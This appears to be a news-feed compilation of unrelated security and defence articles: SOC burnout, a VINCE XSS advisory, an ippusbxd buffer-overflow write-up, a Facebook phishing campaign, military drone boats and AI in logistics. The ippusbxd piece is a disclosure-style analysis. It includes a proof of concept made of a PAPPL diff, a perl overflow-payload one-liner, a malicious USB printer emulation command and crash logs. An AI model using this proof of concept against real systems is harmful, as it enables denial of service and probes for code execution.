For too long, we've treated our analysts as mere cogs in a machine, expecting them to conform to the limitations of our tools and processes. It's time to revolutionize security operations.

Source: Brain light via Alamy Stock Photo

COMMENTARY

In the battle against cyber threats, we're losing our most vital asset: our people. While the industry fixates on the latest tools and technologies, security analysts are burning out, crushed under the weight of an impossible mission. This isn't just a talent shortage, but an existential crisis threatening the future of cybersecurity defense. Until we prioritize supporting the humans at the heart of cyber operations, no tool or technology will be enough to keep us secure.

Security operations centers (SOCs), the heart of cybersecurity, have become pressure cookers of burnout and frustration. The numbers tell a dire story: More than half of SOC analysts have considered leaving the field, and with them goes the institutional knowledge and expertise that take years to develop. Each departure is a victory for malicious actors, who know that even the most sophisticated tools are only as effective as the humans behind them.

There's a tendency to frame this simply as a talent shortage. In one sense, it is. 53% of organizations report a critical lack of skilled cybersecurity workers. But this misses the direness of the current reality. We can't hire our way out of this disaster. It takes years to develop an analyst capable of detecting and responding to sophisticated threats. By the time junior analysts gain the expertise to handle advanced attacks, they're already burning out and searching for greener pastures. Cyber defenders need relief now.

The crisis extends beyond front-line defenders. Nearly a quarter of chief information security officers (CISOs) and IT security leaders are considering stepping down, with 93% citing unsustainable stress levels. They face mounting pressure to demonstrate return on investment (ROI) while navigating increasing legal and compliance risks, and even personal liability. It's no wonder the average tenure of a CISO is only 18 to 26 months — less than half of the general C-suite tenure.

Somehow, we've normalized this chaos. In any other critical operation, like the military, this level of systemic burnout would be considered an existential risk. Instead, we keep piling on more tools, more alerts, and more responsibilities, mistaking the symptoms for the disease.

Our industry has a blind spot. We've focused so much on software and hardware that we've forgotten about the "humanware" of security workflows. We've overlooked the frontline analysts, the threat hunters, and the managers whose judgment and intellectual horsepower are the real engine of modern security operations.

This matters so deeply to me on a personal level. In my Air Force career, I was a special operations helicopter pilot. Picture it: skimming treetops under night vision goggles, working with elite teams, pushing the boundaries of what seemed possible. Despite the intense pressure and risk, I never once thought about walking away. Why? Because I had cutting-edge equipment, unwavering support from my leadership, and a mission that made my heart race. I would have done it for free.

Today, cyber defenders are the pilots of the 21st century. It's the coolest job on the planet: battling sophisticated adversaries in real-time, protecting the critical infrastructure that powers our economy, and racing against the clock to stop attacks that could affect millions. They should be having the time of their lives. Instead, they're burning out.

**Technology Isn't the Solution — Reshaping Support Is**

The answer isn't just better technology — it's about fundamentally reshaping how we support our people. The industry talks constantly about analysts learning from AI, but we're missing something crucial: the AI must learn from our analysts as well. Their expertise, their pattern recognition, their hard-won instincts about what doesn't look quite right; this human judgment is irreplaceable. We need to give our humans AI partners that learn from them, support them, freeing them to focus on the high-level, intellectually stimulating work that drew them to cybersecurity in the first place.

Imagine SOCs where analysts focus on outsmarting adversaries instead of drowning in false positives. Where AI handles the repetitive tasks but learns from human insights, creating a virtuous cycle of improvement. Where the technology amplifies human expertise instead of trying to replace it. Where the job is as exhilarating as flying a combat mission, because you have tools that learn and evolve alongside you. (In a recent episode of CSO Perspectives, I go into depth of what that looks like.)

For too long, we've treated our analysts as mere cogs in a machine, expecting them to conform to the limitations of our tools and processes.

It's time to revolutionize security operations. When we get this right, we won't just solve our retention crisis. We'll create a field that the best and brightest are eager to join, where analysts don't just survive, but thrive in the mission of keeping us all safe. The future of cybersecurity belongs not to those who build better tools, but to those who best empower defenders to wield them.

**About the Author**

Chief Product Officer, Andesite

William MacMillan, Chief Product Officer at Andesite, is an experienced executive leader, advisor and trusted voice on cyber, digital transformation and national security. Prior to Andesite, he served as the Senior Vice President for Information Security at Salesforce. Before retiring from the federal government, William served as the CISO at the Central Intelligence Agency, where he led a sweeping transformation of the CIA’s cybersecurity strategy and organization. Before this, he held multiple senior leadership positions at the CIA, dealing with various aspects of intelligence, counterintelligence and cyber operations. Throughout his career, William focused significant attention on insider threat, supply chain risk and incident response issues, as well as the development of CIA’s Cybersecurity Operations Center (CSOC).

Analyst Burnout Is an Advanced Persistent Threat

The framework suffers from an authenticated stored cross-site scripting vulnerability. Input passed to the 'content' POST parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

Title: CMU CERT/CC VINCE v2.0.6 Stored XSS  
Advisory ID: ZSL-2025-5917  
Type: Local/Remote  
Impact: Cross-Site Scripting  
Risk: (3/5)  
Release Date: 10.02.2025

**Summary**

VINCE is the Vulnerability Information and Coordination Environment developed and used by the CERT Coordination Center to improve coordinated vulnerability disclosure. VINCE is a Python-based web platform.

**Description**

The framework suffers from an authenticated stored cross-site scripting vulnerability. Input passed to the 'content' POST parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

**Vendor**

Carnegie Mellon University - https://www.kb.cert.org

**Affected Version**

<=2.0.6

**Tested On**

nginx/1.20.0  
Django 3.2.17

**Vendor Status**

\[13.01.2023\] Vulnerability discovered.  
\[13.01.2023\] Vendor informed.  
\[30.03.2023\] Vendor releases version 2.0.7 to address this issue.  
\[10.02.2025\] Public security advisory released.

**PoC**

vince\_xss.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://github.com/CERTCC/VINCE/releases/tag/v2.0.7  
\[2\] https://packetstorm.news/files/id/189098/

**Changelog**

\[10.02.2025\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

CMU CERT/CC VINCE v2.0.6 Stored XSS

By Aleksandar Nikolich
Earlier this year, we conducted code audits of the macOS printing subsystem, which is heavily based on the open-source CUPS package. During this investigation, IPP-USB protocol caught our attention. IPP over USB specification defines how printers that are available over USB can only still support network printing

Monday, February 10, 2025 08:30

_By Aleksandar Nikolich_

Earlier this year, we conducted code audits of the macOS printing subsystem, which is heavily based on the open-source CUPS package. During this investigation, IPP-USB protocol caught our attention. IPP over USB specification defines how printers that are available over USB can only still support network printing via Internet Printing Protocol (IPP). After wrapping up the macOS investigation, we decided to take a look at how other operating systems handle the same functionality. 

Our target Linux system was running Ubuntu 22.04, a long-term support (LTS) release that handled IPP-USB via the “ippusbxd” package. This package is part of the OpenPrinting suite of printing tools that was under a lot of scrutiny recently due to several high severity vulnerabilities in different components. Publicity around these issues has caused undue stress on the OpenPrinting suite maintainers, so, although the potential vulnerability we are about to discuss is very real, mitigating circumstances make it less severe. The vulnerability is discovered and made unexploitable by modern compiler features, and we are highlighting this rare win. Additionally, the “ippusbxd” package is replaced by a safer “ipp-usb” solution, making exploitation of this vulnerability less likely.

**Discovering the vulnerability**

On Ubuntu-flavored Linux systems, when a new USB printer is plugged in, UDEV subsystem will invoke an IPP-USB handler to enable IPP-USB functionality. In Ubuntu 22.04, this is “ippusbxd” daemon, which handles communication with the printer, announces it to the network over DNS-SD, and makes it available on a network port. As this has a potential for an interesting attack surface, it piqued our interest.

The first step when getting familiar with a code base is to try to build it. While doing so, we were presented with the following message:

    In file included from /usr/include/string.h:495,
                     from ippusbxd-1.34/src/capabilities.c:9:
    In function ‘strncpy’,
        inlined from ‘get_format_paper’ at ippusbxd-1.34/src/capabilities.c:205:9:
    /usr/include/x86_64-linux-gnu/bits/string_fortified.h:106:10: warning: ‘__builtin___strncpy_chk’ 
                  specified bound depends on the length of the source argument [-Wstringop-overflow=]
      106 |   return __builtin___strncpy_chk (__dest, __src, __len, __bos (__dest));
          |          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ippusbxd-1.34/src/capabilities.c: In function ‘get_format_paper’:
    ippusbxd-1.34/src/capabilities.c:204:13: note: length computed here
      204 |         a = strlen(val) - strlen(tmp);
          |             ^~~~~~~~~~~
    In file included from /usr/include/string.h:495,
                     from ippusbxd-1.34/src/capabilities.c:9: 

Above is a compiler warning, enabled by “-Wstringop-overflow”, which performs lightweight static code analysis during compilation to catch common memory corruption issues. In this particular case, the compiler is telling us that there exists a potential vulnerability in the highlighted code. Essentially, compiler analysis has judged that a length argument to a “strncpy” call is based on the length of the source operand instead of the destination operand. This is a classic case of a stack-based buffer overflow involving the “strcpy” family of functions. 

To confirm that this is indeed a true positive finding, we looked at code context:

    char test1[255] = { 0 };
           char test2[255] = { 0 };
           char *tmp = strchr(val, '=');
           if (!tmp) continue;
           a = strlen(val) - strlen(tmp);           
           val+=(a + 1);
           tmp = strchr(val, ' ');
           if (!tmp) continue;
           a = strlen(val) - strlen(tmp);                                    
           strncpy(test2, val, a);                 

The above excerpt is in the part of the code that is trying to parse paper dimensions supported by the printer. Expected input would be:

    { x-dimension=1234 y-dimension=1234 }

Calls to “strlen” are used to calculate the length of the incoming numerical values, and the code can indeed result in a straightforward buffer overflow if the value specified in ”y-dimension” is longer than the buffer can hold.

Looking up the users of the offending code reveals that it’s only used during printer initialization, while interrogating printer capabilities:

    int
    ipp_request(ippPrinter *printer, int port)
    {
      http_t    *http = NULL; 
      ipp_t *request, *response = NULL;
      ipp_attribute_t *attr;
      char uri[1024];
      char buffer[1024];
      /* Try to connect to IPP server */
      if ((http = httpConnect2("127.0.0.1", port, NULL, AF_UNSPEC,
                   HTTP_ENCRYPTION_IF_REQUESTED, 1, 30000, NULL)) == NULL) {
        printf("Unable to connect to 127.0.0.1 on port %d.\n", port);
        return 1;
      }
      snprintf(uri, sizeof(uri), "http://127.0.0.1:%d/ipp/print", port);
      /* Fire a Get-Printer-Attributes request */
      request = ippNewRequest(IPP_OP_GET_PRINTER_ATTRIBUTES);
      ippAddString(request, IPP_TAG_OPERATION, IPP_TAG_URI, "printer-uri",
                     NULL, uri);
      response = cupsDoRequest(http, request, "/ipp/print");

In other words, this vulnerability would be triggered if a printer connected to a machine’s USB port reports supporting abnormally large media size

The compiler was right, this indeed constitutes a vulnerability. If exploited against a locked laptop, it could result in arbitrary code execution in a process with high privileges. 

**Developing a proof of concept**

To prove the existence and severity of this vulnerability, we need to develop a proof of concept (PoC) exploit. Since triggering this vulnerability technically requires a malicious printer being physically connected to the USB port, we have some work to do. 

An obvious route for implementing this is by using Linux USB Gadget API. The Linux USB Gadget API allows developers to create custom software-defined USB devices (i.e., gadgets). It enables device emulation, interface management, and communication protocol handling for virtual devices. In this scenario, an embedded Linux system acts as a USB device, instead of a USB host, and emulates desired functionality. Gadget drivers emulating an ethernet network interface or mass storage device are readily available in all Linux systems, and small single board computers can be used for this purpose. Among these, Raspberry Pi Zero fits all the requirements. 

Implementing a whole emulated USB printer would require significant effort, but PAPPL (a project related to OpenPrinting) already implements a featureful printer gadget that we can easily repurpose. A minimal modification to the source code is required to make the emulated printer report malicious media dimensions:

    diff --git a/pappl/printer-driver.c b/pappl/printer-driver.c
    index 10b7fda..b872865 100644
    --- a/pappl/printer-driver.c
    +++ b/pappl/printer-driver.c
    @@ -747,6 +747,7 @@ make_attrs(
           ippDelete(cvalues[i]);
       }
    +  ippAddString(attrs, IPP_TAG_PRINTER, IPP_CONST_TAG(IPP_TAG_KEYWORD), "media-size-supported",  NULL, getenv("EXPLOIT_STRING"));                      [5]
       // media-col-supported
       memcpy((void *)svalues, media_col, sizeof(media_col));
    diff --git a/testsuite/testpappl.c b/testsuite/testpappl.c
    index 460058d..7972cb6 100644
    --- a/testsuite/testpappl.c
    +++ b/testsuite/testpappl.c
    @@ -812,7 +812,7 @@ main(int  argc,                             // I - Number of command-line arguments
         }
         else
         {
    -      printer = papplPrinterCreate(system, /* printer_id */0, "Office Printer", "pwg_common-300dpi-600dpi-srgb_8", "MFG:PWG;MDL:Office Printer;", device_uri);
    +      printer = papplPrinterCreate(system, /* printer_id */0, "Office Printer", "pwg_common-300dpi-600dpi-srgb_8", "MFG:PWG;MDL:Office Printer;CMD:pwg;", device_uri);         [4]
           papplPrinterSetContact(printer, &contact);
           papplPrinterSetDNSSDName(printer, "Office Printer");
           papplPrinterSetGeoLocation(printer, "geo:46.4707,-80.9961");

In the above code, we instruct the emulated printer to use contents of the “EXPLOIT_STRING” environment variable as its “media-size-supported” payload. 

To set up the trigger, we first set the \`EXPLOIT_STRING\` to contain our buffer overflow payload:

    export EXPLOIT_STRING=`perl -e 'print "{x=a y=" . "A"x600 . " }"'`

Above will report \`y\` dimension to have a series of 600 A characters--enough to overflow both stack buffers and cause a crash. 

Then, we run the following on our Raspberry Pi Zero device:

    testsuite/testpappl -U -c -1 -L debug -l - --usb-vendor-id 0xeaea --usb-product-id 0xeaea

The above command, using a utility from PAPPL suite, sets up an emulated USB printer device that will, when connected via USB to our target machine, deliver our buffer overflow payload. 

The next step is to simply connect the Raspberry Pi Zero device to the target and observe the effect:

    [520463.829183] usb 3-1: new high-speed USB device number 85 using xhci_hcd
    [520463.977791] usb 3-1: New USB device found, idVendor=eaea, idProduct=eaea, bcdDevice= 4.19
    [520463.977800] usb 3-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
    [520463.977804] usb 3-1: Product: Office Printer
    [520463.977807] usb 3-1: Manufacturer: PWG
    [520463.977809] usb 3-1: SerialNumber: 0
    [520463.979354] usblp 3-1:1.0: usblp0: USB Bidirectional printer dev 85 if 0 alt 0 proto 2 vid 0xEAEA pid 0xEAEA
    [520464.014666] usblp0: removed
    [520464.020827] ippusbxd[647107]: segfault at 0 ip 00007f9886cd791d sp 00007ffe5965e558 error 4 in libc.so.6[7f9886b55000+195000]
    [520464.020839] Code: 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 89 f8 48 89 fa c5 f9 ef c0 25 ff 0f 00 00 3d e0 0f 00 00 0f 87 23 01 00 00 <c5> fd 74 0f c5 fd d7 c1 85 c0 74 57 f3 0f bc c0 e9 2c 01 00 00 66

The above debug log shows that a segmentation fault has occurred in \`ippusbxd\` daemon as expected, signifying that we have successfully triggered this vulnerability.

**FORTIFY\_SOURCE**

However, closer inspection of the binary and the crash reveals the following:

    <-195299776>Note: TCP: sent 1833 bytes
    <-228919744>Note: Thread #2: No read in flight, starting a new one
    *** buffer overflow detected ***: terminated
    Thread 4 "ippusbxd" received signal SIGABRT, Aborted.
    [Switching to Thread 0x7ffff3dbe640 (LWP 649455)]
    __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737284662848) at ./nptl/pthread_kill.c:44
    44      ./nptl/pthread_kill.c: No such file or directory.
    (gdb) bt
    #0  __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737284662848) at ./nptl/pthread_kill.c:44
    #1  __pthread_kill_internal (signo=6, threadid=140737284662848) at ./nptl/pthread_kill.c:78
    #2  __GI___pthread_kill (threadid=140737284662848, signo=signo@entry=6) at ./nptl/pthread_kill.c:89
    #3  0x00007ffff7aea476 in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
    #4  0x00007ffff7ad07f3 in __GI_abort () at ./stdlib/abort.c:79
    #5  0x00007ffff7b31676 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7c8392e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
    #6  0x00007ffff7bde3aa in __GI___fortify_fail (msg=msg@entry=0x7ffff7c838d4 "buffer overflow detected") at ./debug/fortify_fail.c:26
    #7  0x00007ffff7bdcd26 in __GI___chk_fail () at ./debug/chk_fail.c:28
    #8  0x00007ffff7bdc769 in __strncpy_chk (s1=s1@entry=0x7ffff3dbd090 "", s2=s2@entry=0x7ffff3dbd5f7 'A' <repeats 200 times>..., n=n@entry=601, s1len=s1len@entry=255) at ./debug/strncpy_chk.c:26
    #9  0x000055555555f502 in strncpy (__len=601, __src=0x7ffff3dbd5f7 'A' <repeats 200 times>..., __dest=0x7ffff3dbd090 "") at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:95
    #10 get_format_paper (val=0x7ffff3dbd5f7 'A' <repeats 200 times>..., val@entry=0x7ffff3dbd5f0 "{x=a y=", 'A' <repeats 193 times>...) at ./ippusbxd_testing/ippusbxd-1.34/src/capabilities.c:220
    #11 0x000055555555fa62 in ipp_request (printer=printer@entry=0x7fffec000b70, port=<optimized out>) at ./ippusbxd_testing/ippusbxd-1.34/src/capabilities.c:297
    #12 0x000055555555d07c in dnssd_escl_register (data=0x5555555a77e0) at ./ippusbxd_testing/ippusbxd-1.34/src/dnssd.c:226
    #13 0x00007ffff7b3cac3 in start_thread (arg=<optimized out>) at ./nptl/pthread_create.c:442
    #14 0x00007ffff7bce660 in clone3 () at ../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

What caused the crash wasn’t directly the buffer overflow that overwrote stack content causing memory corruption. Nor was it stack smashing protection, a probabilistic mitigation that can be bypassed under certain conditions. In this case, the crash was caused by explicit program termination due to a detected condition for buffer overflow before it happened. This detection is the result of a compiler feature called “FORTIFY_SOURCE”, which replaces common error-prone functions with safer versions automatically. This means that the vulnerability is strongly mitigated and isn’t exploitable beyond causing a crash. 

**Conclusion**

We often hear of all the failings of software and vulnerabilities and mitigation bypasses, and we felt we should take this opportunity to highlight the opposite. In this case, modern compiler features, static analysis via -Wstringop-overflow and strong mitigation via FORTIFY_SOURCE, saved the day. These should always be enabled by default. Additionally, those compiler warnings are only useful if someone actually reads them. 

In this case, the impact of this vulnerability would be minor even if it were widely exploitable. The \`ippusbxd\` package development was abandoned in favor of a superior implementation via the “ipp-usb package implemented in a memory safe language that would prevent these sorts of issues from occurring in the first place. Developers readily point out that \`ippusbxd\` has been surpassed by \`ipp-usb\`, isn’t maintained, and isn’t used by any operating system. Ubuntu 22.04 being a long-term support version is an exception. Newer versions have switched to using \`ipp-usb\`.

Small praise for modern compilers - A case of Ubuntu printing vulnerability that wasn’t

A new phishing campaign is targeting businesses with fake Facebook copyright notices.  Learn how to spot the signs and keep your Facebook account secure.

Facebook, the world’s leading social media platform, has become the subject of a new **phishing campaign** that has targeted over 12,000 email addresses across hundreds of businesses, reveals the latest research from Check Point Research (CPR). 

This campaign, which began around December 20th, 2024, primarily focuses on companies within the EU, the US, and Australia. Still, some instances have also been detected in Chinese and Arabic languages, indicating a global reach.

Reportedly, scammers are leveraging **Salesforce’s automated mailing** service to distribute these deceptive emails, without manipulating the sender ID, which makes these emails appear to originate from \[email protected\], lending a sense of authenticity to their operation.

These emails carry counterfeit Facebook logos and falsely accuse recipients of copyright infringement. Such as in a sample email screenshot researchers have shared, the attackers cite the unauthorized use of copyrighted music owned by Universal Music Group as the issue. 

According to CPR’s **report**, recipients are then threatened with account restrictions, including limitations on posting, live streaming, or advertising unless they contest the claim within a short timeframe.

2 of the phishing emails used in the campaign (Via CPR)

This deception continues with a fraudulent Facebook support page, the link to which is included in the email and unsuspecting victims are prompted to enter their login credentials. This page is designed to extract sensitive information, falsely claiming that these details are necessary for an account review rather than disablement.

The landing page itself mimics the legitimate Facebook interface as shown in the screenshot. It features an “Account Overview” section with details of a supposed “Account Restriction.”  It falsely claims the user is “not allowed to use Meta Products to advertise” due to non-compliance with Advertising Standards.  The page includes fake options to “Request a review” and “Unlock advanced features,” further enticing victims to provide their credentials.

The screenshot reveals a cybercriminal’s fraudulent landing page designed to harvest login credentials (Via CPR)

This campaign threatens Facebook-dependent businesses worldwide by allowing cybercriminals to control their admin accounts, alter content, manipulate messaging, delete posts, and modify security settings. This can lead to negative consequences such as client trust erosion, customer attrition, and potential legal actions. For businesses in regulated industries like healthcare and finance, breaches can result in non-compliance, fines, and legal challenges, researchers noted.

It is worth noting that Facebook is often targeted in copyright infringement-based scams. Last year, **Hackread reported** a sophisticated scam targeting META business owners, claiming their page would be permanently deleted due to a post allegedly infringing on trademark rights, forcing them to click on malicious links under the guise of resolving policy violations.

Therefore, organizations should implement a clear incident response plan, including steps for recovering compromised accounts, setting up alert systems for suspicious logins and unusual account activity and training employees to verify Facebook account page status. These strategies can significantly reduce vulnerability to the campaign.

Scammers Use Fake Facebook Copyright Notices to Hijack Accounts

Swarms of weaponized unmanned surface vessels have proven formidable weapons in the Black and Red Seas. Can the US military learn the right lessons from it?

It was the most expensive war game in US military history, and the outcome was a disaster.

Conducted in 2002 and costing roughly $250 million to plan over two years, the so-called Millennium Challenge exercise pitted a Blue team representing the United States against a Red team representing a fictional state in the Persian Gulf, usually understood as Iran or Iraq, as a means of testing the US Defense Department’s post-Cold War doctrine based on advanced new technologies and concepts.

Despite the Blue Team’s ostensible military and technological superiority, the Red team, led by Marine Corps Lieutenant General Paul Van Riper, unleashed complete chaos upon its adversary using unanticipated asymmetric and unconventional tactics—most notably, a complex cruise missile attack followed by a wave of explosive-laden kamikaze speedboats that, in one 10-minute swarm, sank 19 Blue team warships and inflicted 20,000 simulated casualties on his adversary. The exercise was so disastrous that the Pentagon went on to impose arbitrary constraints on the Red team that all but ensured a Blue team victory, prompting Van Riper to quit as team leader in protest.

As part of its complicated legacy, Millennium Challenge 2002 had undermined the very advanced technologies it sought to validate, proving that a handful of small watercraft could, when deployed in coordinated swarms amid a larger attack, successfully outmaneuver larger surface warships with potentially deadly consequences. It’s a lesson the Pentagon all but ignored by stacking the deck in favor of the Blue team following the Red team’s initial victory. Now, more than two decades later, its lessons are playing out in battlefields around the world.

View of an explosion on a ship that Houthis say is an attack by them on Greek-owned MV Tutor in the Red Sea, dated June 12, 2024, in this screen grab obtained from a video.Photograph: HOUTHI MEDIA CENTRE/Reuters

Unmanned surface vessels (USVs) loaded with explosives and other lethal payloads are proving a fearsome weapon for ostensibly outgunned fighting forces. Amid Russia’s ongoing invasion, the Ukrainian military has successfully driven Moscow’s Black Sea Fleet from its safe harbor in Sevastopol in the annexed Crimean peninsula using a growing fleet of weaponized drone boats that aren’t just successfully targeting other surface vessels, but engaging shore targets with their own organic kamikaze first-person-view drones and knocking Russian aircraft out of the sky with machine guns and surface-to-air missiles. In the Red Sea, the Iranian-backed Houthi rebels in Yemen have employed explosive-laden watercraft to lesser effect in response to Israel's military campaign against Hamas in Gaza, successfully sinking the Liberia-flagged bulk carrier _MV Tutor_ in June 2024 and consistently disrupting international maritime traffic in the region.

The concept of kamikaze boats isn’t new: The US Navy learned this lesson firsthand in October 2000, when a small boat full of suicide bombers blew a hole in the side of the Arleigh Burke-class destroyer USS _Cole_ in Yemen’s Aden Harbor, killing 17 American sailors. But the Ukrainian and Houthi campaigns both represent weaker belligerents who have used complex attacks of missiles and drones, both airborne and maritime, to significantly disrupt their adversaries’ naval operations just as Van Riper did during Millennium Challenge decades ago.

“Within a few minutes, the US fleet was confronted with boats, cruise missiles, and aircraft, which overwhelmed the electronics and human decisionmaking,” Van Riper tells WIRED. “Small boats themselves have been demonstrated by Ukraine as useful, but to the degree they can be complemented with other systems they are even more effective.”

The US military has been steadily exploring the potential applications of USVs to naval warfare for years. Four large USVs associated with the US Navy’s Ghost Fleet Overlord initiative have been autonomously transiting oceans since at least 2018 as part of a large-scale effort to add unmanned systems to the surface fleet. In 2021, the Navy stood up Task Force 59 to “rapidly integrate unmanned systems and artificial intelligence with maritime operations” in the 5th Fleet area of operations in the Middle East, as officials announced at the time. The following year, the service established an Unmanned Surface Vessel Division to focus on building the “foundational knowledge” for the regular operation and sustainment of USVs. And in mid-2024, the service unveiled a new Robotic Warfare Specialist to focus on drone systems and stood up a separate squadron of small USVs explicitly “to deliver the most formidable, unmanned platforms in the maritime domain,” according to officials.

Commercial operators deploy Saildrone Voyager Unmanned Surface Vessels out to sea in the initial steps of U.S. 4th Fleet’s Operation Windward Stack during a launch from Naval Air Station Key West’s Mole Pier and Truman Harbor, on September 13, 2023.Photograph: Danette Baso Silvers/US NAVY

Today, USVs of all sizes are used for everything from surveillance and reconnaissance to mine sniffing, augmenting the existing surface fleet as floating sensor nodes for sailors aboard conventional warships.

The US isn’t alone in its newfound focus on drone boats. In December 2024, officials with the North Atlantic Treaty Organization (NATO) laid out plans for the alliance’s own fleet of small USVs to operate as a robotic surveillance network like “street-lighting” in busy Atlantic waterways. Then, in January, NATO’s Maritime Command announced that a contingent of 20 USVs would participate in NATO’s new Baltic Sentry operation, which is designed to safeguard sensitive communications, power cables, and other “critical infrastructure” throughout the Baltic Sea that have been the focus of sabotage efforts in recent years.

With the threat of a future conflict with China over Taiwan’s sovereignty looming on the horizon, the Navy has kicked its USV ambitions into high gear. As part of the Pentagon’s ongoing Replicator initiative launched in 2023 to quickly field both low-cost ("attritable," in US military speak) unmanned systems to US troops abroad ahead of the next big war with a “near-peer” adversary like Russia or China, the Navy has pursued the rapid production of swarms of small, networked USV “interceptors” through its Production-Ready Inexpensive Maritime Expeditionary (PRIME) Small Unmanned Surface Vehicle (sUSV) project. These interceptors are capable of “loitering in an assigned operating area while monitoring for maritime surface threats, and then sprinting to interdict a noncooperative, maneuvering vessel,” as the Defense Innovation Unit solicitation described them.

It’s unclear what those future interceptors may look like, but the Navy and Marine Corps have in recent years experimented with various armed USVs designed to engage adversary surface fleets with lethal payloads. They include the Textron Systems–produced Expeditionary Warfare USV armed with a .50 caliber machine gun and AGM-114 Hellfire missile system the Navy publicly debuted in August 2019; the Common Unmanned Surface Vehicle (CUSV) armed with a .50 cal for force protection Textron demonstrated in 2020; the Marine Corps’ Long Range Unmanned Surface Vessel (LRUSV) outfitted with a launcher for multiple Uvision Hero-120 loitering munitions the service debuted in May 2023; and the MARTAC T38 Devil Ray which successfully destroyed several seaborne targets with Lethal Miniature Aerial Missile System–launched loitering munitions during the Navy’s first two Digital Talon exercises in late 2023. In addition, the Navy’s fiscal year 2024 budget request sought to fund an experiment to test a notional Multi-domain Area Denial from Small-USV (MADS), an unmanned Global Autonomous Reconnaissance Craft outfitted with surface-to-air FIM-92 Stinger missile launchers designed to defend larger vessels against airborne attacks.

“During future conflicts, US and allied forces will be greatly outnumbered by peer or near-peer competitors in both tactical platforms and munitions,” as the Navy’s budget documents described the logic behind the MADS experiment. “Large numbers of small, low signature, attritable unmanned missile launching vessels have the potential to improve surface force magazine depth and reduce risk to force in denied areas.”

A Lethal Miniature Aerial Missile System launches munitions from a MARTAC T-38 Devil Ray unmanned surface vehicle, attached to U.S. Naval Forces Central Command’s Task Force 59, during Exercise Digital Talon in the Arabian Gulf on October 23, 2023.Photograph: Chief Mass Communication Specialist Justin Stumberg/US NAVY

The Navy’s armed USV efforts appear to have culminated in Project 33, a new initiative unveiled as part of Chief of Naval Operations Admiral Lisa Franchetti’s 2024 Navigation Plan in September 2024 that focuses on, among other targets, “scal\[ing\] robotic and autonomous systems to integrate more platforms at speed” in an ostensible complement to the Pentagon’s larger Replicator effort, designed to outfit American fleets with armed robot boats ahead of a potential future war with China.

“This Navigation Plan drives toward two strategic ends: readiness for the possibility of war with the People’s Republic of China by 2027 and enhancing the Navy’s long-term advantage,” as Franchetti wrote at the time. “We will work towards these ends through two mutually reinforcing ways: implementing Project 33 and expanding the Navy’s contribution to the Joint warfighting ecosystem … By 2027, we will integrate proven robotic and autonomous systems for routine use by the commanders who will employ them.”

The Defense Department seems confident that the Navy’s robotic push will help prepare the US military for the possibility of war with China, but some seasoned military and defense observers have their misgivings. Van Riper points to Marine Corps’ Force Design 2030, a reorganization of the service ahead of a notional island-hopping conflict against China in the Pacific, as evidence that the Pentagon still hasn’t learned the right lessons from Millennium Challenge 2002.

The Marine Corps “was known for being an air-ground combined arms rapid-response deployed around the world,” Van Riper tells WIRED. “Now it has divested itself of every element of combined arms or reduced it, getting rid of its armor, breaching vehicles, mine clearing, and assault bridging capabilities, cutting its infantry and aviation, all to buy missiles and go on the defense in the Pacific. The Marine Corps got rid of existing capabilities in favor of unproven or undelivered capabilities.”

Indeed, the US military’s propensity to fixate on next-generation technology like drone boats as a one-size-fits-all combat solution may obscure those tactical lessons in combined arms evident in the Ukrainian campaign in the Red Sea, Van Riper says.

“You shouldn’t take the use of drones in isolation with what Ukraine is doing,” Van Riper says. “We presented the Navy fleet \[in Millennium Challenge 2002\] with multiple challenges, which is really what combined arms is. What you’re doing is presenting the enemy with a dilemma: If he tries to protect himself against threat A, he’s vulnerable to threat B, and with threats C, D, and E, he’s unable to handle it. In Ukraine, boats plus missiles and aircraft are more difficult for the Russians to respond to.”

“I’m not sure the US military today is equipped to learn from those things,” he adds. “I’m depressed from the leadership on all levels, particularly the naval services.”

The Rise of the Drone Boats

Supply chains are under immense pressure. Fuel costs are skyrocketing, delays are becoming the norm, and cybersecurity threats…

Supply chains are under immense pressure. Fuel costs are skyrocketing, delays are becoming the norm, and **cybersecurity threats** are more sophisticated than ever. Artificial intelligence (AI) has stepped in as the most powerful tool to combat these challenges, but it’s no longer just about automation; it’s about making real-time decisions that prevent losses before they happen.

The impact of AI in logistics is undeniable. Companies leveraging **AI in logistics and transportation** have reported up to a **30%** (PDF) reduction in delivery times and 12% lower fuel costs, while AI-driven fraud detection systems are cutting supply chain losses by 40%.

However, AI’s expansion into logistics has also **opened new vulnerabilities**, as cybercriminals are finding ways to manipulate automated systems, hack self-driving fleets, and disrupt global supply chains. AI is not just revolutionizing logistics, it’s becoming the next growing target for cyberattacks

****Cybersecurity Risks in AI-Powered Logistics****

As logistics companies increasingly rely on AI-driven automation, they also expose themselves to cyberattacks that target these very systems. One of the most infamous cyberattacks in supply chain history, the **NotPetya ransomware attack on Maersk**, cost the company over $300 million, bringing global shipping to a standstill. Similarly, hackers are now attempting to breach AI-driven warehouses, manipulate cargo tracking systems, and exploit self-driving vehicle software to reroute valuable shipments.

The rise of AI-powered fraud is another growing concern. Cybercriminals are using AI to predict shipment schedules, intercept high-value goods, and manipulate route optimization algorithms to misdirect cargo. In some cases, attackers have even **poisoned AI models**, feeding them false data to cause miscalculations in supply chain forecasting. Without proper cybersecurity measures, AI-driven logistics can become a liability instead of an asset.

****How AI is Strengthening Cybersecurity in Logistics****

Fortunately, AI is not just a target; it’s also a powerful defence against cyber threats in logistics. Companies are deploying AI to detect anomalies, prevent fraud, and monitor logistics networks for suspicious activity in real time.

**AI-powered fraud detection** systems now scan supply chains for unusual shipment patterns, unauthorized reroutes, and manipulated cargo tracking data, helping prevent cargo theft before it happens.

